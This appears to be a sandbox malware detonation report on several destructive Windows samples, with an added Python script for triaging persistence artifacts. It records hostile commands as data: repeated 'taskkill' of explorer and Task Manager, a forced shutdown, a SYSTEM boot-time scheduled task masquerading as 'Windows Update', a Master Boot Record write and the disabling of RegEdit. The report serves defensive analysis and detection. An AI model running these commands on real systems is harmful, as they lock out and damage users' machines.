C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\explorer.exe
explorer
C:\Windows\explorer.exe
explorer
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe.bat
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe.bat
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\explorer.exe
explorer
C:\Windows\explorer.exe
explorer
C:\Windows\explorer.exe
explorer
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\explorer.exe
explorer
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe.bat
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe.bat
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe
C:\Windows\explorer.exe
explorer
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe.bat
C:\Windows\explorer.exe
explorer
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe.bat
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe.bat
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe
C:\Windows\explorer.exe
explorer
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe
C:\Windows\explorer.exe
explorer
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe
C:\Windows\explorer.exe
explorer
C:\Windows\explorer.exe
C:\Windows\explorer.exe /factory,{682159d9-c321-47ca-b3f1-30e36b2ec8b9} -Embedding
C:\Windows\explorer.exe
explorer
C:\Windows\system32\dwm.exe
"dwm.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe.bat
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\explorer.exe
explorer
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\explorer.exe
explorer
C:\Windows\explorer.exe
explorer
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe
C:\Windows\explorer.exe
explorer
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe.bat
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\shutdown.exe
shutdown -s -t 60
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe.bat
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe.bat
C:\Windows\explorer.exe
explorer
C:\Windows\explorer.exe
explorer
C:\Windows\explorer.exe
explorer
C:\Windows\explorer.exe
explorer
C:\Windows\explorer.exe
explorer
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe.bat
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe.bat
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe.bat
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe.bat
C:\Windows\explorer.exe
explorer
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe
C:\Windows\explorer.exe
explorer
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe
C:\Windows\explorer.exe
explorer
C:\Windows\explorer.exe
explorer
C:\Windows\explorer.exe
explorer
C:\Windows\explorer.exe
explorer
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\werfault.exe
werfault.exe /hc /shared Global\dda93ae4242b4054bd2dd3ce26335145 /t 3008 /p 2252
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe.bat
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe
C:\Windows\explorer.exe
explorer
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe.bat
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\explorer.exe
explorer
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe.bat
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe.bat
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe.bat
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe.bat
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe.bat
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe.bat
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe.bat
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\explorer.exe
explorer
C:\Windows\explorer.exe
explorer
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe.bat
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe
C:\Windows\explorer.exe
explorer
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe.bat
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe
C:\Windows\explorer.exe
explorer
C:\Windows\explorer.exe
explorer
C:\Windows\explorer.exe
explorer
C:\Windows\explorer.exe
explorer
C:\Windows\explorer.exe
explorer
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe.bat
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe
C:\Windows\explorer.exe
explorer
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe.bat
C:\Windows\explorer.exe
explorer
C:\Windows\explorer.exe
explorer
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\explorer.exe
explorer
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe
C:\Windows\explorer.exe
explorer
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe.bat
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe
C:\Windows\explorer.exe
explorer
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe.bat
C:\Windows\explorer.exe
explorer
C:\Windows\explorer.exe
explorer
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe.bat
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe.bat
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe
C:\Windows\explorer.exe
explorer
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe.bat
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe
C:\Windows\explorer.exe
explorer
C:\Windows\explorer.exe
explorer
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe
C:\Windows\explorer.exe
explorer
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe
C:\Windows\system32\dwm.exe
"dwm.exe"
C:\Windows\explorer.exe
explorer
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\explorer.exe
explorer
C:\Windows\explorer.exe
explorer
C:\Windows\system32\LogonUI.exe
"LogonUI.exe" /flags:0x4 /state0:0xa3fad855 /state1:0x41c64e6d
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 20.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 181.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.154.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 55.36.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 41.110.16.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 86.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 134.71.91.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 178.113.50.184.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 137.71.105.51.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NetPakoe.bat
| MD5 | 6c5a9741a170d3ac2e2c89d3e91ea6ea |
| SHA1 | 7034266eefee8c6437d966f5d91ea82e50e10d59 |
| SHA256 | 4d1a5d2255194f08a772aef2363514890ecd620dfc49e5b701fc8f2e2388e616 |
| SHA512 | 9dcf12e971da1c78d92dd7ff824d50e8487ae61bfb9dcbfea6c38f8ebba22994fde19d825e44f4632aba9e0fc34d75cd87e090b75ed78b51b908128cc22ce29c |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NetPakoe.bat
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
Analysis: behavioral30
Detonation Overview
Submitted
2024-03-02 20:26
Reported
2024-03-02 20:36
Platform
win10v2004-20240226-en
Max time kernel
116s
Max time network
205s
Command Line
Signatures
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\NoEscape8.0.exe | N/A |
Enumerates physical storage devices
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2460 wrote to memory of 568 | N/A | C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\NoEscape8.0.exe | C:\Windows\SysWOW64\cmd.exe |
| PID 2460 wrote to memory of 568 | N/A | C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\NoEscape8.0.exe | C:\Windows\SysWOW64\cmd.exe |
| PID 2460 wrote to memory of 568 | N/A | C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\NoEscape8.0.exe | C:\Windows\SysWOW64\cmd.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\NoEscape8.0.exe
"C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\NoEscape8.0.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\yourpc\skid.bat" "
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 20.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 9.228.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.204.248.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 41.110.16.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.200:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 86.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.134.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | chromewebstore.googleapis.com | udp |
| US | 8.8.8.8:53 | chromewebstore.googleapis.com | udp |
| US | 8.8.8.8:53 | 196.178.17.96.in-addr.arpa | udp |
| GB | 142.250.200.10:443 | chromewebstore.googleapis.com | tcp |
| US | 8.8.8.8:53 | 177.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 27.73.42.20.in-addr.arpa | udp |
Files
C:\yourpc\skid.bat
| MD5 | 427d18145e233d828cdbad04596134c9 |
| SHA1 | 84cb6fae8ee844be1fd9eda8a6a74a5cce97ded8 |
| SHA256 | 23efa2c8b42c0c599a2bd60cadfab2eac3a439e891509dc70c1ee2a9f5e86f2c |
| SHA512 | fd5e0a70a4bd082311ab5559b832ba8ae8fce91a62faeec827e3a14a302ceda3697b2cc4d9f1c082170fe22ffff52b022791ebc8c6ec35a3946a9c3712e99444 |
Analysis: behavioral24
Detonation Overview
Submitted
2024-03-02 20:26
Reported
2024-03-02 20:35
Platform
win10v2004-20240226-en
Max time kernel
155s
Max time network
186s
Command Line
Signatures
Disables RegEdit via registry modification
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1" | C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\MercuryXhoffle.exe | N/A |
Disables Task Manager via registry modification
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\MercuryXhoffle.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\bootrec.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Windows Update = "C:\\Users\\Admin\\AppData\\Local\\Temp\\bootrec.exe" | C:\Users\Admin\AppData\Local\Temp\bootrec.exe | N/A |
Writes to the Master Boot Record (MBR)
| Description | Indicator | Process | Target |
| File opened for modification | \??\PhysicalDrive0 | C:\Users\Admin\AppData\Local\Temp\bootrec.exe | N/A |
Enumerates physical storage devices
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\MercuryXhoffle.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\MercuryXhoffle.exe | N/A |
| Token: 33 | N/A | C:\Windows\system32\AUDIODG.EXE | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\system32\AUDIODG.EXE | N/A |
Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3652 wrote to memory of 4748 | N/A | C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\MercuryXhoffle.exe | C:\Users\Admin\AppData\Local\Temp\bootrec.exe |
| PID 3652 wrote to memory of 4748 | N/A | C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\MercuryXhoffle.exe | C:\Users\Admin\AppData\Local\Temp\bootrec.exe |
| PID 3652 wrote to memory of 4748 | N/A | C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\MercuryXhoffle.exe | C:\Users\Admin\AppData\Local\Temp\bootrec.exe |
| PID 4748 wrote to memory of 3224 | N/A | C:\Users\Admin\AppData\Local\Temp\bootrec.exe | C:\Windows\SysWOW64\schtasks.exe |
| PID 4748 wrote to memory of 3224 | N/A | C:\Users\Admin\AppData\Local\Temp\bootrec.exe | C:\Windows\SysWOW64\schtasks.exe |
| PID 4748 wrote to memory of 3224 | N/A | C:\Users\Admin\AppData\Local\Temp\bootrec.exe | C:\Windows\SysWOW64\schtasks.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\MercuryXhoffle.exe
"C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\MercuryXhoffle.exe"
C:\Users\Admin\AppData\Local\Temp\bootrec.exe
"C:\Users\Admin\AppData\Local\Temp\bootrec.exe"
C:\Windows\SysWOW64\schtasks.exe
schtasks.exe /Create /TN "Windows Update" /ru SYSTEM /SC ONSTART /TR "C:\Users\Admin\AppData\Local\Temp\bootrec.exe"
C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x468 0x378
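The persistence in this run is what a responder would hunt for on other hosts: the `schtasks /Create ... /ru SYSTEM /SC ONSTART /TR "<path under %TEMP%>"` command above, the Run value `Windows Update` pointing at the same dropped bootrec.exe, and the `DisableRegistryTools` policy value (the "Disables Task Manager" signature refers to its sibling `DisableTaskMgr`). The behavioral29 run later on this page repeats the task pattern with `/TN wininit` and `C:\yourpc\boot.exe`. Note that registering a task as SYSTEM needs an elevated token, so on a standard-user host that command fails while the Run value, which needs no elevation, still lands. The Python below is an added example, not part of the sandbox report or its tooling: it tokenizes such command lines and registry set events and flags the combination of SYSTEM context, boot trigger and a target outside the Windows and Program Files trees. The trusted-root list, the lookalike task names and the thresholds are assumptions chosen to fit this report; the sample inputs are copied from the rows above plus one constructed benign line.

```python
"""Triage of the persistence artifacts recorded in this run: schtasks /Create
command lines and registry 'Set value' events.  Added example, not sandbox code."""
import re
from typing import Dict, List, Optional, Tuple

# Assumption: anything outside these roots is treated as user-writable.  Tune per estate.
TRUSTED_ROOTS = ("c:\\windows\\", "c:\\program files\\", "c:\\program files (x86)\\")
# Assumption: task names from this report that impersonate Windows components.
LOOKALIKE_TASK_NAMES = {"windows update", "wininit"}
# Policy values under ...\Policies\System whose data "1" disables a built-in tool.
POLICY_KILLS = {"disabletaskmgr": "Task Manager", "disableregistrytools": "Registry Editor"}


def tokenize(cmdline: str) -> List[str]:
    """Split a Windows command line on whitespace while keeping "quoted paths" whole."""
    return [quoted or bare for quoted, bare in re.findall(r'"([^"]*)"|(\S+)', cmdline)]


def is_trusted_path(path: str) -> bool:
    return path.strip().strip('"').lower().startswith(TRUSTED_ROOTS)


def parse_schtasks(cmdline: str) -> Optional[Dict[str, str]]:
    """Return {'/tn': ..., '/ru': ..., ...} for a schtasks /Create line, else None."""
    toks = tokenize(cmdline)
    if not toks:
        return None
    exe = toks[0].lower().rsplit("\\", 1)[-1]
    if exe not in ("schtasks", "schtasks.exe") or "/create" not in {t.lower() for t in toks}:
        return None
    opts: Dict[str, str] = {}
    i = 1
    while i < len(toks):
        if toks[i].startswith("/") and i + 1 < len(toks) and not toks[i + 1].startswith("/"):
            opts[toks[i].lower()] = toks[i + 1]   # switch with a value: /TN "Windows Update"
            i += 2
        else:
            opts[toks[i].lower()] = ""            # bare switch: /Create
            i += 1
    return opts


def triage_task(cmdline: str) -> List[str]:
    opts = parse_schtasks(cmdline)
    if opts is None:
        return []
    findings = []
    name, target = opts.get("/tn", ""), opts.get("/tr", "")
    if opts.get("/ru", "").lower() in ("system", "nt authority\\system") and not is_trusted_path(target):
        findings.append(f"SYSTEM task '{name}' runs from user-writable path: {target}")
    if opts.get("/sc", "").lower() in ("onstart", "onlogon") and not is_trusted_path(target):
        findings.append(f"task '{name}' re-runs {target} at boot/logon")
    if name.lower() in LOOKALIKE_TASK_NAMES:
        findings.append(f"task name '{name}' impersonates a Windows component")
    return findings


def triage_registry_set(value_path: str, data: str) -> List[str]:
    """value_path is the full path ending in the value name, as the report prints it."""
    lowered = value_path.lower()
    name = lowered.rsplit("\\", 1)[-1]
    # The report escapes backslashes in REG_SZ data; fold them back before path checks.
    data = data.strip('"').replace("\\\\", "\\")
    if name in POLICY_KILLS and "\\policies\\system\\" in lowered and data == "1":
        return [f"{POLICY_KILLS[name]} disabled via {name} = 1"]
    if "\\currentversion\\run\\" in lowered and not is_trusted_path(data):
        return [f"Run value '{name}' starts {data}"]
    return []


def run_triage(cmdlines: List[str], reg_sets: List[Tuple[str, str]]) -> List[str]:
    findings: List[str] = []
    for c in cmdlines:
        findings += triage_task(c)
    for path, data in reg_sets:
        findings += triage_registry_set(path, data)
    return findings


# Inputs copied from this report (behavioral24 and behavioral29) plus one constructed benign line.
SAMPLE_CMDLINES = [
    r'schtasks.exe /Create /TN "Windows Update" /ru SYSTEM /SC ONSTART /TR "C:\Users\Admin\AppData\Local\Temp\bootrec.exe"',
    r'schtasks.exe /Create /TN wininit /ru SYSTEM /SC ONSTART /TR "C:\yourpc\boot.exe"',
    r'schtasks.exe /Create /TN Backup /SC DAILY /TR "C:\Program Files\Backup\backup.exe"',  # constructed, benign
]
SAMPLE_REG_SETS = [
    (r"\REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools", "1"),
    (r"\REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Windows Update",
     r"C:\\Users\\Admin\\AppData\\Local\\Temp\\bootrec.exe"),
]

if __name__ == "__main__":
    for line in run_triage(SAMPLE_CMDLINES, SAMPLE_REG_SETS):
        print("-", line)
```

Run against the rows above, the two malicious task lines each produce three findings (SYSTEM context, boot trigger, lookalike name), the benign line none, and the two registry events one each. The tokenizer is deliberately not `shlex`, which follows POSIX quoting rules and mangles Windows paths.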
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 68.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 9.228.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 186.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 41.110.16.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.169.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 140.71.91.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 196.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 27.73.42.20.in-addr.arpa | udp |
Files
memory/3652-0-0x00007FF957A50000-0x00007FF9583F1000-memory.dmp
memory/3652-1-0x0000000001BE0000-0x0000000001BF0000-memory.dmp
memory/3652-2-0x000000001C5E0000-0x000000001CAAE000-memory.dmp
